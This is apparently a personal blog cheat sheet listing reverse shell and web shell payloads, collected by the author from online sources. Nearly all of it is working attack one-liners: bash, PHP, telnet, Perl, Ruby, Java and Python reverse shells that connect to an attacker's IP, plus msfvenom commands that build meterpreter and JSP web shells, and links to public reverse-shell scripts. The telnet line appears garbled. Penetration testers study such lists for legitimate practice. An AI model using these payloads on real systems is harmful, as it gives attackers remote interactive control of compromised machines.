There is a few types of Shell that we can use to access the machine
- Reverse Shell
- Web Shell
Disclaimer: All the commands below have not been done by myself but I do some researching on the internet
Reverse Shell
A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the attacker’s host. Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack. Reverse shells can also work across a NAT or security system.
Below are the example reverse shell that i can think now:
Bash
bash -i >& /dev/tcp/ip/port 0>&1
PHP
PHP - php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
Telnet
telnet = rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
PERL
PERL = perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby
RUBY = ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
JAVA
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP Reverse Shell – php-reverse-shell/php-reverse-shell.php at master · pentestmonkey/php-reverse-shell · GitHub
Aspx Reverse shell – aspx-reverse-shell/shell.aspx at master · borjmz/aspx-reverse-shell · GitHub
Web-shells
PHP
This php-shell is OS-independent. You can use it on both Linux and Windows.
msfvenom -p php/meterpreter_reverse_tcp LHOST=ip LPORT=443 -f raw > shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=443 -f asp > shell.asp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=443 -f war > shell.war
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=443 -f raw > shell.jsp